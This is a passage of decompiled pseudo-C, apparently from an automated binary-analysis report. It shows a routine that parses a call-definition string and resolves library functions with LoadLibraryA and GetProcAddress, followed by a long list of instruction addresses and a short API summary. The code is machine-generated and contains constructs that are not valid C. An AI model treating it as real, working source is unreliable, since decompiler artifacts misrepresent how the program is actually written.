								if(_t291 == _t253) {
									goto L56;
								} else {
									goto L28;
								}
								while(1) {
									L28:
									_t218 =  *(_t291 + 0x14a0);
									__eflags = _t218 - _t253;
									if(_t218 == _t253) {
										break;
									}
									_t290 = _t291;
									_t291 = _t218;
									__eflags = _t291 - _t253;
									if(_t291 != _t253) {
										continue;
									}
									break;
								}
								__eflags = _t290 - _t253;
								if(_t290 != _t253) {
									 *(_t290 + 0x14a0) = _t253;
								}
								_t219 =  *(_t291 + 0x810);
								__eflags = _t219 & 0x00000008;
								if((_t219 & 0x00000008) == 0) {
									 *(_t291 + 0x810) = _t219 | 0x00000002;
								} else {
									_t291 = E1000187C(_t291);
									 *(_t291 + 0x810) =  *(_t291 + 0x810) & 0xfffffff5;
								}
								goto L56;
							} else {
								_t266 = _t259 - 1;
								__eflags = _t266;
								if(_t266 == 0) {
									L24:
									lstrcpyA(_t190, _v44);
									L25:
									lstrcpyA(_t284, _v24);
									L56:
									_v28 = _v24;
									L57:
									_v8 = _v8 + 1;
									if(_v32 != 0xffffffff) {
										continue;
									}
									break;
								}
								_t267 = _t266 - 1;
								__eflags = _t267;
								if(_t267 == 0) {
									goto L25;
								}
								__eflags = _t267 != 1;
								if(_t267 != 1) {
									goto L56;
								}
								goto L24;
							}
						}
						if(_t188 == 1) {
							_t226 = _v16;
							if(_v40 == _t253) {
								_t226 = _t226 - 1;
							}
							 *(_t291 + 0x814) = _t226;
						}
						goto L56;
					}
					_t227 = _t186 - 0x23;
					if(_t227 == 0) {
						_v32 = _t253;
						_v36 = _t253;
						goto L13;
					}
					_t228 = _t227 - 5;
					if(_t228 == 0) {
						__eflags = _v36 - _t283;
						_v32 = 1;
						_v12 = _t253;
						_v20 = _t253;
						_v16 = (0 | _v36 == _t283) + 1;
						_v40 = _t253;
						goto L13;
					}
					_t232 = _t228 - 1;
					if(_t232 == 0) {
						_v32 = 2;
						_v12 = _t253;
						_v20 = _t253;
						goto L13;
					}
					if(_t232 != 0x16) {
						_t235 = _v32 - _t253;
						__eflags = _t235;
						if(_t235 == 0) {
							__eflags = _t282 - 0x2a;
							if(_t282 == 0x2a) {
								_v36 = 2;
								L55:
								_t253 = 0;
								__eflags = 0;
								goto L56;
							}
							__eflags = _t282 - 0x2d;
							if(_t282 == 0x2d) {
								L124:
								_t237 = _v8 + 1;
								__eflags =  *_t237 - 0x3e;
								if( *_t237 != 0x3e) {
									L126:
									_t237 = _v8 + 1;
									__eflags =  *_t237 - 0x3a;
									if( *_t237 != 0x3a) {
										L133:
										_v28 =  &(_v28[1]);
										 *_v28 = _t282;
										goto L57;
									}
									__eflags = _t282 - 0x2d;
									if(_t282 == 0x2d) {
										goto L133;
									}
									_v36 = 1;
									L129:
									_v8 = _t237;
									__eflags = _v28 - _v24;
									if(_v28 <= _v24) {
										 *_v44 =  *_v44 & 0x00000000;
									} else {
										 *_v28 =  *_v28 & 0x00000000;
										lstrcpyA(_v44, _v24);
									}
									goto L55;
								}
								_v36 = _t283;
								goto L129;
							}
							__eflags = _t282 - 0x3a;
							if(_t282 != 0x3a) {
								goto L133;
							}
							__eflags = _t282 - 0x2d;
							if(_t282 != 0x2d) {
								goto L126;
							}
							goto L124;
						}
						_t244 = _t235 - 1;
						__eflags = _t244;
						if(_t244 == 0) {
							L68:
							_t245 = _t257 - 0x22;
							__eflags = _t245 - 0x55;
							if(_t245 > 0x55) {
								goto L55;
							}
							switch( *((intOrPtr*)(( *(_t245 + 0x100023a0) & 0x000000ff) * 4 +  &M10002344))) {
								case 0:
									__eax = _v24;
									__edi = _v8;
									while(1) {
										__edi = __edi + 1;
										_v8 = __edi;
										__cl =  *__edi;
										__eflags = __cl - __dl;
										if(__cl != __dl) {
											goto L108;
										}
										L107:
										__eflags =  *(__edi + 1) - __dl;
										if( *(__edi + 1) != __dl) {
											L112:
											 *__eax =  *__eax & 0x00000000;
											__ebx = E10001550(_v24);
											goto L84;
										}
										L108:
										__eflags = __cl;
										if(__cl == 0) {
											goto L112;
										}
										__eflags = __cl - __dl;
										if(__cl == __dl) {
											__edi = __edi + 1;
											__eflags = __edi;
										}
										__cl =  *__edi;
										 *__eax =  *__edi;
										__eax = __eax + 1;
										__edi = __edi + 1;
										_v8 = __edi;
										__cl =  *__edi;
										__eflags = __cl - __dl;
										if(__cl != __dl) {
											goto L108;
										}
										goto L107;
									}
								case 1:
									_v12 = 1;
									goto L55;
								case 2:
									_v12 = _v12 | 0xffffffff;
									goto L55;
								case 3:
									_v12 = _v12 & 0x00000000;
									_v20 = _v20 & 0x00000000;
									_v16 = _v16 + 1;
									goto L73;
								case 4:
									__eflags = _v20;
									if(_v20 != 0) {
										goto L55;
									}
									_v8 = _v8 - 1;
									__ebx = E10001541();
									 &_v8 = E10001CD9( &_v8);
									__eax = E1000176C(__edx, __eax, __edx, __ebx);
									goto L84;
								case 5:
									L92:
									_v20 = _v20 + 1;
									goto L55;
								case 6:
									_push(0x19);
									goto L119;
								case 7:
									_push(0x15);
									goto L119;
								case 8:
									_push(0x16);
									goto L119;
								case 9:
									_push(0x18);
									goto L119;
								case 0xa:
									_push(5);
									goto L99;
								case 0xb:
									__eax = 0;
									__eax = 1;
									goto L78;
								case 0xc:
									_push(6);
									goto L99;
								case 0xd:
									_push(2);
									goto L99;
								case 0xe:
									_push(3);
									goto L99;
								case 0xf:
									_push(0x17);
									L119:
									_pop(__ebx);
									goto L85;
								case 0x10:
									__eax =  &_v8;
									__eax = E10001CD9( &_v8);
									__ebx = __eax;
									__ebx = __eax + 1;
									__eflags = __ebx - 0xb;
									if(__ebx < 0xb) {
										__ebx = __ebx + 0xa;
									}
									goto L84;
								case 0x11:
									__ebx = 0xffffffff;
									goto L85;
								case 0x12:
									__eax = 0;
									__eflags = 0;
									goto L78;
								case 0x13:
									_push(4);
									L99:
									_pop(__eax);
									L78:
									__edx = _v16;
									__ecx = 0;
									__edx = _v16 << 5;
									__ecx = 1;
									__eflags = _v12 - 0xffffffff;
									__edi = (_v16 << 5) + __esi;
									_v40 = 1;
									 *(__edi + 0x818) = __eax;
									if(_v12 == 0xffffffff) {
										L80:
										__eax = __ecx;
										L81:
										__eflags = _v12 - __ecx;
										 *(__edi + 0x828) = __eax;
										if(_v12 == __ecx) {
											__eax =  &_v8;
											__eax = E10001CD9( &_v8);
											__eax = __eax + 1;
											__eflags = __eax;
											_v12 = __eax;
										}
										__eax = _v12;
										 *((intOrPtr*)(__edi + 0x81c)) = _v12;
										_t126 = _v16 + 0x41; // 0x41
										_t126 = _t126 << 5;
										__eax = 0;
										__eflags = 0;
										 *((intOrPtr*)((_t126 << 5) + __esi)) = 0;
										 *((intOrPtr*)(__edi + 0x82c)) = 0;
										 *((intOrPtr*)(__edi + 0x830)) = 0;
										goto L84;
									}
									__eax =  *(0x10003058 + __eax * 4);
									__eflags = __eax;
									if(__eax > 0) {
										goto L81;
									}
									goto L80;
								case 0x14:
									_t247 =  *(_t291 + 0x814);
									__eflags = _t247 - _v16;
									if(_t247 > _v16) {
										_v16 = _t247;
									}
									_v12 = _v12 & 0x00000000;
									_v20 = _v20 & 0x00000000;
									_v36 - 3 = _t247 - (_v36 == 3);
									if(_t247 != _v36 == 3) {
										L73:
										_v40 = 1;
									}
									goto L55;
								case 0x15:
									__eax =  &_v8;
									__eax = E10001CD9( &_v8);
									__ebx = __eax;
									__ebx = __eax + 1;
									L84:
									__eflags = __ebx;
									if(__ebx == 0) {
										goto L55;
									}
									L85:
									__eflags = _v20;
									_v40 = 1;
									if(_v20 != 0) {
										L90:
										__eflags = _v20 - 1;
										if(_v20 == 1) {
											__eax = _v16;
											__eax = _v16 << 5;
											__eflags = __eax;
											 *(__eax + __esi + 0x830) = __ebx;
										}
										goto L92;
									}
									_v16 = _v16 << 5;
									_t134 = __esi + 0x82c; // 0x82c
									__edi = (_v16 << 5) + _t134;
									__eax =  *__edi;
									__eflags = __eax - 0xffffffff;
									if(__eax <= 0xffffffff) {
										L88:
										__eax = GlobalFree(__eax);
										L89:
										 *__edi = __ebx;
										goto L90;
									}
									__eflags = __eax - 0x19;
									if(__eax <= 0x19) {
										goto L89;
									}
									goto L88;
								case 0x16:
									goto L55;
							}
						}
						_t248 = _t244 - 1;
						__eflags = _t248;
						if(_t248 == 0) {
							_v16 = _t253;
							goto L68;
						}
						__eflags = _t248 != 1;
						if(_t248 != 1) {
							goto L133;
						}
						_t271 = _t257 - 0x21;
						__eflags = _t271;
						if(_t271 == 0) {
							_v12 =  ~_v12;
							goto L55;
						}
						_t272 = _t271 - 0x42;
						__eflags = _t272;
						if(_t272 == 0) {
							L51:
							__eflags = _v12 - 1;
							if(_v12 != 1) {
								_t84 = _t291 + 0x810;
								 *_t84 =  *(_t291 + 0x810) &  !0x00000001;
								__eflags =  *_t84;
							} else {
								 *(_t291 + 0x810) =  *(_t291 + 0x810) | 1;
							}
							_v12 = 1;
							goto L55;
						}
						_t276 = _t272;
						__eflags = _t276;
						if(_t276 == 0) {
							_push(0x20);
							L50:
							_pop(1);
							goto L51;
						}
						_t277 = _t276 - 9;
						__eflags = _t277;
						if(_t277 == 0) {
							_push(8);
							goto L50;
						}
						_push(4);
						_pop(1);
						_t278 = _t277 - 1;
						__eflags = _t278;
						if(_t278 == 0) {
							goto L51;
						}
						_t279 = _t278 - 1;
						__eflags = _t279;
						if(_t279 == 0) {
							_push(0x10);
							goto L50;
						}
						__eflags = _t279 != 0;
						if(_t279 != 0) {
							goto L55;
						}
						_push(0x40);
						goto L50;
					} else {
						_v32 = _t283;
						_v12 = 1;
						goto L13;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t291 == _t253 ||  *(_t291 + 0x80c) != _t253) {
					L145:
					return _t291;
				} else {
					_t198 =  *_t291 - 1;
					if(_t198 == 0) {
						_t169 = _t291 + 8; // 0x8
						_t286 = _t169;
						__eflags =  *_t286;
						if( *_t286 != 0) {
							_t199 = GetModuleHandleA(_t286);
							__eflags = _t199 - _t253;
							 *(_t291 + 0x808) = _t199;
							if(_t199 != _t253) {
								L141:
								_t173 = _t291 + 0x408; // 0x408
								_t254 = _t173;
								_t200 = GetProcAddress( *(_t291 + 0x808), _t254);
								__eflags = _t200;
								 *(_t291 + 0x80c) = _t200;
								if(_t200 != 0) {
									goto L145;
								}
								lstrcatA(_t254, 0x10004024);
								_t202 = GetProcAddress( *(_t291 + 0x808), _t254);
								__eflags = _t202;
								L143:
								 *(_t291 + 0x80c) = _t202;
								if(__eflags != 0) {
									goto L145;
								}
								L144:
								_t178 = _t291 + 4;
								 *_t178 =  *(_t291 + 4) | 0xffffffff;
								__eflags =  *_t178;
								goto L145;
							}
							_t203 = LoadLibraryA(_t286);
							__eflags = _t203 - _t253;
							 *(_t291 + 0x808) = _t203;
							if(_t203 == _t253) {
								goto L144;
							}
							goto L141;
						}
						_t170 = _t291 + 0x408; // 0x408
						_t202 = E10001641(_t170);
						__eflags = _t202 - _t253;
						goto L143;
					}
					_t205 = _t198 - 1;
					if(_t205 == 0) {
						_t167 = _t291 + 0x408; // 0x408
						_t206 = _t167;
						__eflags =  *_t206;
						if( *_t206 == 0) {
							goto L145;
						}
						_t207 = E10001641(_t206);
						L136:
						 *(_t291 + 0x80c) = _t207;
						goto L145;
					}
					if(_t205 != 1) {
						goto L145;
					}
					_t72 = _t291 + 8; // 0x8
					_t255 = _t72;
					_t288 = E10001641(_t72);
					 *(_t291 + 0x808) = _t288;
					if(_t288 == 0) {
						goto L144;
					}
					 *(_t291 + 0x850) =  *(_t291 + 0x850) & 0x00000000;
					 *((intOrPtr*)(_t291 + 0x84c)) = E10001550(_t255);
					 *(_t291 + 0x83c) =  *(_t291 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t291 + 0x848)) = 1;
					 *((intOrPtr*)(_t291 + 0x838)) = 1;
					_t81 = _t291 + 0x408; // 0x408
					_t207 =  *(_t288->i + E10001641(_t81) * 4);
					goto L136;
				}
			}





























































                                                                                                                          0x10001d43
                                                                                                                          0x10001d46
                                                                                                                          0x10001d49
                                                                                                                          0x10001d4c
                                                                                                                          0x10001d4f
                                                                                                                          0x10001d52
                                                                                                                          0x10001d55
                                                                                                                          0x10001d57
                                                                                                                          0x10001d5c
                                                                                                                          0x10001d5f
                                                                                                                          0x10001d67
                                                                                                                          0x10001d6a
                                                                                                                          0x10001d6f
                                                                                                                          0x10001d72
                                                                                                                          0x10001d75
                                                                                                                          0x10001d75
                                                                                                                          0x10001d7c
                                                                                                                          0x10001d7d
                                                                                                                          0x10001d80
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001d8d
                                                                                                                          0x10001d8f
                                                                                                                          0x10001d94
                                                                                                                          0x10001d96
                                                                                                                          0x10001def
                                                                                                                          0x10001def
                                                                                                                          0x10001def
                                                                                                                          0x10001df3
                                                                                                                          0x10001df6
                                                                                                                          0x10001df8
                                                                                                                          0x10001e1a
                                                                                                                          0x10001e1d
                                                                                                                          0x10001e1f
                                                                                                                          0x10001e28
                                                                                                                          0x10001e2e
                                                                                                                          0x10001e30
                                                                                                                          0x10001e36
                                                                                                                          0x10001e36
                                                                                                                          0x10001e3c
                                                                                                                          0x10001e3f
                                                                                                                          0x10001e3f
                                                                                                                          0x10001e42
                                                                                                                          0x10001e42
                                                                                                                          0x10001e48
                                                                                                                          0x10001e4a
                                                                                                                          0x10001e4d
                                                                                                                          0x10001e53
                                                                                                                          0x10001e56
                                                                                                                          0x10001e56
                                                                                                                          0x10001e58
                                                                                                                          0x10001e5e
                                                                                                                          0x10001e61
                                                                                                                          0x10001e8c
                                                                                                                          0x10001e8f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001e96
                                                                                                                          0x10001e98
                                                                                                                          0x10001ea6
                                                                                                                          0x10001ea9
                                                                                                                          0x10001eab
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001eb1
                                                                                                                          0x10001eb1
                                                                                                                          0x10001eb1
                                                                                                                          0x10001eb7
                                                                                                                          0x10001eb9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001ebb
                                                                                                                          0x10001ebd
                                                                                                                          0x10001ebf
                                                                                                                          0x10001ec1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001ec1
                                                                                                                          0x10001ec3
                                                                                                                          0x10001ec5
                                                                                                                          0x10001ec7
                                                                                                                          0x10001ec7
                                                                                                                          0x10001ecd
                                                                                                                          0x10001ed3
                                                                                                                          0x10001ed5
                                                                                                                          0x10001eeb
                                                                                                                          0x10001ed7
                                                                                                                          0x10001edd
                                                                                                                          0x10001ee0
                                                                                                                          0x10001ee0
                                                                                                                          0x00000000
                                                                                                                          0x10001e63
                                                                                                                          0x10001e63
                                                                                                                          0x10001e63
                                                                                                                          0x10001e64
                                                                                                                          0x10001e70
                                                                                                                          0x10001e74
                                                                                                                          0x10001e7a
                                                                                                                          0x10001e7e
                                                                                                                          0x10001f64
                                                                                                                          0x10001f67
                                                                                                                          0x10001f6a
                                                                                                                          0x10001f6a
                                                                                                                          0x10001f71
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001f71
                                                                                                                          0x10001e66
                                                                                                                          0x10001e66
                                                                                                                          0x10001e67
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001e69
                                                                                                                          0x10001e6a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001e6a
                                                                                                                          0x10001e61
                                                                                                                          0x10001dfb
                                                                                                                          0x10001e04
                                                                                                                          0x10001e07
                                                                                                                          0x10001e14
                                                                                                                          0x10001e14
                                                                                                                          0x10001e09
                                                                                                                          0x10001e09
                                                                                                                          0x00000000
                                                                                                                          0x10001dfb
                                                                                                                          0x10001d98
                                                                                                                          0x10001d9b
                                                                                                                          0x10001de7
                                                                                                                          0x10001dea
                                                                                                                          0x00000000
                                                                                                                          0x10001dea
                                                                                                                          0x10001d9d
                                                                                                                          0x10001da0
                                                                                                                          0x10001dcb
                                                                                                                          0x10001dce
                                                                                                                          0x10001dd5
                                                                                                                          0x10001ddc
                                                                                                                          0x10001ddf
                                                                                                                          0x10001de2
                                                                                                                          0x00000000
                                                                                                                          0x10001de2
                                                                                                                          0x10001da2
                                                                                                                          0x10001da3
                                                                                                                          0x10001dba
                                                                                                                          0x10001dc1
                                                                                                                          0x10001dc4
                                                                                                                          0x00000000
                                                                                                                          0x10001dc4
                                                                                                                          0x10001da8
                                                                                                                          0x10001ef6
                                                                                                                          0x10001ef6
                                                                                                                          0x10001ef8
                                                                                                                          0x10002225
                                                                                                                          0x10002228
                                                                                                                          0x10002289
                                                                                                                          0x10001f62
                                                                                                                          0x10001f62
                                                                                                                          0x10001f62
                                                                                                                          0x00000000
                                                                                                                          0x10001f62
                                                                                                                          0x1000222a
                                                                                                                          0x1000222d
                                                                                                                          0x10002239
                                                                                                                          0x1000223c
                                                                                                                          0x1000223d
                                                                                                                          0x10002240
                                                                                                                          0x10002247
                                                                                                                          0x1000224a
                                                                                                                          0x1000224b
                                                                                                                          0x1000224e
                                                                                                                          0x10002295
                                                                                                                          0x10002298
                                                                                                                          0x1000229b
                                                                                                                          0x00000000
                                                                                                                          0x1000229b
                                                                                                                          0x10002250
                                                                                                                          0x10002253
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002255
                                                                                                                          0x1000225c
                                                                                                                          0x1000225c
                                                                                                                          0x10002262
                                                                                                                          0x10002265
                                                                                                                          0x10002281
                                                                                                                          0x10002267
                                                                                                                          0x10002270
                                                                                                                          0x10002273
                                                                                                                          0x10002273
                                                                                                                          0x00000000
                                                                                                                          0x10002265
                                                                                                                          0x10002242
                                                                                                                          0x00000000
                                                                                                                          0x10002242
                                                                                                                          0x1000222f
                                                                                                                          0x10002232
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002234
                                                                                                                          0x10002237
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002237
                                                                                                                          0x10001efe
                                                                                                                          0x10001efe
                                                                                                                          0x10001eff
                                                                                                                          0x10002026
                                                                                                                          0x10002026
                                                                                                                          0x1000202b
                                                                                                                          0x1000202e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1000203b
                                                                                                                          0x00000000
                                                                                                                          0x100021cd
                                                                                                                          0x100021d0
                                                                                                                          0x100021d3
                                                                                                                          0x100021d3
                                                                                                                          0x100021d4
                                                                                                                          0x100021d7
                                                                                                                          0x100021d9
                                                                                                                          0x100021db
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x100021dd
                                                                                                                          0x100021dd
                                                                                                                          0x100021e0
                                                                                                                          0x100021f2
                                                                                                                          0x100021f5
                                                                                                                          0x100021fe
                                                                                                                          0x00000000
                                                                                                                          0x100021fe
                                                                                                                          0x100021e2
                                                                                                                          0x100021e2
                                                                                                                          0x100021e4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x100021e6
                                                                                                                          0x100021e8
                                                                                                                          0x100021ea
                                                                                                                          0x100021ea
                                                                                                                          0x100021ea
                                                                                                                          0x100021eb
                                                                                                                          0x100021ed
                                                                                                                          0x100021ef
                                                                                                                          0x100021d3
                                                                                                                          0x100021d4
                                                                                                                          0x100021d7
                                                                                                                          0x100021d9
                                                                                                                          0x100021db
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x100021db
                                                                                                                          0x00000000
                                                                                                                          0x10002082
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1000208e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002075
                                                                                                                          0x10002079
                                                                                                                          0x1000207d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1000219f
                                                                                                                          0x100021a3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x100021a9
                                                                                                                          0x100021b1
                                                                                                                          0x100021b8
                                                                                                                          0x100021c0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002147
                                                                                                                          0x10002147
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1000221d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1000220d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002211
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002219
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1000215f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1000214f
                                                                                                                          0x10002151
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002167
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002157
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1000215b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002215
                                                                                                                          0x1000221f
                                                                                                                          0x1000221f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1000216f
                                                                                                                          0x10002173
                                                                                                                          0x10002178
                                                                                                                          0x1000217b
                                                                                                                          0x1000217c
                                                                                                                          0x1000217f
                                                                                                                          0x10002185
                                                                                                                          0x10002185
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002205
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002097
                                                                                                                          0x10002097
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002163
                                                                                                                          0x10002169
                                                                                                                          0x10002169
                                                                                                                          0x10002099
                                                                                                                          0x10002099
                                                                                                                          0x1000209c
                                                                                                                          0x1000209e
                                                                                                                          0x100020a1
                                                                                                                          0x100020a2
                                                                                                                          0x100020a6
                                                                                                                          0x100020a9
                                                                                                                          0x100020ac
                                                                                                                          0x100020b2
                                                                                                                          0x100020bf
                                                                                                                          0x100020bf
                                                                                                                          0x100020c1
                                                                                                                          0x100020c1
                                                                                                                          0x100020c4
                                                                                                                          0x100020ca
                                                                                                                          0x100020cc
                                                                                                                          0x100020d0
                                                                                                                          0x100020d5
                                                                                                                          0x100020d5
                                                                                                                          0x100020d7
                                                                                                                          0x100020d7
                                                                                                                          0x100020da
                                                                                                                          0x100020dd
                                                                                                                          0x100020e6
                                                                                                                          0x100020e9
                                                                                                                          0x100020ec
                                                                                                                          0x100020ec
                                                                                                                          0x100020ee
                                                                                                                          0x100020f1
                                                                                                                          0x100020f7
                                                                                                                          0x00000000
                                                                                                                          0x100020f7
                                                                                                                          0x100020b4
                                                                                                                          0x100020bb
                                                                                                                          0x100020bd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002042
                                                                                                                          0x10002048
                                                                                                                          0x1000204b
                                                                                                                          0x1000204d
                                                                                                                          0x1000204d
                                                                                                                          0x10002050
                                                                                                                          0x10002054
                                                                                                                          0x10002061
                                                                                                                          0x10002063
                                                                                                                          0x10002069
                                                                                                                          0x10002069
                                                                                                                          0x10002069
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1000218d
                                                                                                                          0x10002191
                                                                                                                          0x10002196
                                                                                                                          0x10002199
                                                                                                                          0x100020fd
                                                                                                                          0x100020fd
                                                                                                                          0x100020ff
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002105
                                                                                                                          0x10002105
                                                                                                                          0x10002109
                                                                                                                          0x10002110
                                                                                                                          0x10002134
                                                                                                                          0x10002134
                                                                                                                          0x10002138
                                                                                                                          0x1000213a
                                                                                                                          0x1000213d
                                                                                                                          0x1000213d
                                                                                                                          0x10002140
                                                                                                                          0x10002140
                                                                                                                          0x00000000
                                                                                                                          0x10002138
                                                                                                                          0x10002115
                                                                                                                          0x10002118
                                                                                                                          0x10002118
                                                                                                                          0x1000211f
                                                                                                                          0x10002121
                                                                                                                          0x10002124
                                                                                                                          0x1000212b
                                                                                                                          0x1000212c
                                                                                                                          0x10002132
                                                                                                                          0x10002132
                                                                                                                          0x00000000
                                                                                                                          0x10002132
                                                                                                                          0x10002126
                                                                                                                          0x10002129
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1000203b
                                                                                                                          0x10001f05
                                                                                                                          0x10001f05
                                                                                                                          0x10001f06
                                                                                                                          0x10002023
                                                                                                                          0x00000000
                                                                                                                          0x10002023
                                                                                                                          0x10001f0c
                                                                                                                          0x10001f0d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001f13
                                                                                                                          0x10001f13
                                                                                                                          0x10001f16
                                                                                                                          0x10001f5f
                                                                                                                          0x00000000
                                                                                                                          0x10001f5f
                                                                                                                          0x10001f18
                                                                                                                          0x10001f18
                                                                                                                          0x10001f1b
                                                                                                                          0x10001f43
                                                                                                                          0x10001f46
                                                                                                                          0x10001f49
                                                                                                                          0x10002015
                                                                                                                          0x10002015
                                                                                                                          0x10002015
                                                                                                                          0x10001f4f
                                                                                                                          0x10001f4f
                                                                                                                          0x10001f4f
                                                                                                                          0x1000201b
                                                                                                                          0x00000000
                                                                                                                          0x1000201b
                                                                                                                          0x10001f1e
                                                                                                                          0x10001f1e
                                                                                                                          0x10001f1f
                                                                                                                          0x10001f40
                                                                                                                          0x10001f42
                                                                                                                          0x10001f42
                                                                                                                          0x00000000
                                                                                                                          0x10001f42
                                                                                                                          0x10001f21
                                                                                                                          0x10001f21
                                                                                                                          0x10001f24
                                                                                                                          0x10001f3c
                                                                                                                          0x00000000
                                                                                                                          0x10001f3c
                                                                                                                          0x10001f26
                                                                                                                          0x10001f28
                                                                                                                          0x10001f29
                                                                                                                          0x10001f29
                                                                                                                          0x10001f2b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001f2d
                                                                                                                          0x10001f2d
                                                                                                                          0x10001f2e
                                                                                                                          0x10001f38
                                                                                                                          0x00000000
                                                                                                                          0x10001f38
                                                                                                                          0x10001f31
                                                                                                                          0x10001f32
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001f34
                                                                                                                          0x00000000
                                                                                                                          0x10001dae
                                                                                                                          0x10001dae
                                                                                                                          0x10001db1
                                                                                                                          0x00000000
                                                                                                                          0x10001db1
                                                                                                                          0x10001da8
                                                                                                                          0x10001f80
                                                                                                                          0x10001f85
                                                                                                                          0x10001f8a
                                                                                                                          0x10001f8e
                                                                                                                          0x1000233d
                                                                                                                          0x10002343
                                                                                                                          0x10001fa0
                                                                                                                          0x10001fa2
                                                                                                                          0x10001fa3
                                                                                                                          0x100022c0
                                                                                                                          0x100022c0
                                                                                                                          0x100022c3
                                                                                                                          0x100022c6
                                                                                                                          0x100022da
                                                                                                                          0x100022e0
                                                                                                                          0x100022e2
                                                                                                                          0x100022e8
                                                                                                                          0x100022fb
                                                                                                                          0x10002301
                                                                                                                          0x10002301
                                                                                                                          0x1000230e
                                                                                                                          0x10002310
                                                                                                                          0x10002312
                                                                                                                          0x10002318
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002320
                                                                                                                          0x1000232d
                                                                                                                          0x1000232f
                                                                                                                          0x10002331
                                                                                                                          0x10002331
                                                                                                                          0x10002337
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10002339
                                                                                                                          0x10002339
                                                                                                                          0x10002339
                                                                                                                          0x10002339
                                                                                                                          0x00000000
                                                                                                                          0x10002339
                                                                                                                          0x100022eb
                                                                                                                          0x100022f1
                                                                                                                          0x100022f3
                                                                                                                          0x100022f9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x100022f9
                                                                                                                          0x100022c8
                                                                                                                          0x100022cf
                                                                                                                          0x100022d5
                                                                                                                          0x00000000
                                                                                                                          0x100022d5
                                                                                                                          0x10001fa9
                                                                                                                          0x10001faa
                                                                                                                          0x100022a2
                                                                                                                          0x100022a2
                                                                                                                          0x100022a8
                                                                                                                          0x100022ab
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x100022b2
                                                                                                                          0x100022b7
                                                                                                                          0x100022b8
                                                                                                                          0x00000000
                                                                                                                          0x100022b8
                                                                                                                          0x10001fb1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001fb7
                                                                                                                          0x10001fb7
                                                                                                                          0x10001fc0
                                                                                                                          0x10001fc5
                                                                                                                          0x10001fcb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10001fd1
                                                                                                                          0x10001fde
                                                                                                                          0x10001fe4
                                                                                                                          0x10001fee
                                                                                                                          0x10001ff4
                                                                                                                          0x10001ffc
                                                                                                                          0x1000200c
                                                                                                                          0x00000000
                                                                                                                          0x1000200c

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10001541: GlobalAlloc.KERNELBASE(00000040,10001577,?,?,10001804,?,10001017), ref: 10001549
                                                                                                                            • Part of subcall function 10001561: lstrcpyA.KERNEL32(00000000,?,?,?,10001804,?,10001017), ref: 1000157E
                                                                                                                            • Part of subcall function 10001561: GlobalFree.KERNEL32 ref: 1000158F
